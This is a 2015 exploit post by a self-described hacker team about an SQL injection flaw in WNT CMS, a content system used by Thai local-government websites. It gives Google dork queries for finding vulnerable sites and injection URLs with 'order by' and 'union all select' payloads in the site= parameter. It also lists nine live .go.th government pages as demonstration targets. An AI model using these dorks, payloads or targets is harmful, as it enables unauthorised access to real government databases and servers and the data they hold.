facebook facebook twitter rss

Thailand Gov WNT CMS - SQL Injection Vulnerability

Author: Shelesh Rauthan , Published: 14-07-2015
=========================================================
[+] Title :- Thailand Gov WNT CMS - SQL Injection Vulnerability
[+] Date :- 12 - July - 2015
[+] Vendor Homepage :- http://www.wnt.co.th/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- "Powered By wnt.co.th"
"Powered By wnt.co.th" inurl:"index_webboard_detail.php?site="
"Powered By wnt.co.th" inurl:"index.php?site="
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze, Intelligent-Exploit
[+] Official Website :- serverfarming.com, intelligentexploit.com
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha, DK
[+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com

=========================================================
[+] Severity Level :- High

[+] Request Method(s) :- GET / POST

[+] Vulnerable Parameter(s) :- start=, site=

[+] Affected Area(s) :- Entire admin, database, Server

[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error

[+] SQL vulnerable File :- /home/admintmp/domains/DOMAIN.com/public_html/center/website/management/website_dragdrop/index.php
/home/admintmp/domains/DOMAIN.com/public_html/center/website/site/index_webboard_detail.php

[+] POC :- http://127.0.0.1/index.php?site=[SQL]'

The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.


http://www.[WEBSITE].com/index.php?site=848' order by [SQL IN4JECTION]--+
http://www.[WEBSITE].com/index.php?site=848 union all select [SQL INJECTION]--+


[+] DEMO :- http://www.cpnlocal.go.th/sawi/website/index.php?site=848'
http://www.satunlocal.go.th/khuandon/website/index.php?site=704'
http://www.prachuaplocal.go.th/mueangprachuapkhirikhan/website/index.php?site=694'
http://www.phetchaburilocal.go.th/mueangphetchaburi/website/index.php?site=737'
http://www.ssklocaladmin.go.th/benchalak/website/index.php?site=649'
http://www.natom.go.th/center/website/management/website_dragdrop/index.php?site=918'
http://www.chiangyuen.go.th/center/website/site/index_webboard_detail.php?site=1270&page_id=1270&ws_id=3243&wd_id=11949&wb_id=2164&send_cols=1&start=0'
http://www.tambonmuang.go.th/center/website/site/index_webboard_detail.php?site=1285'
http://www.donpradoo.go.th/center/website/site/index_webboard_detail.php?site=1246'

=======================================================

Like us on Facebook :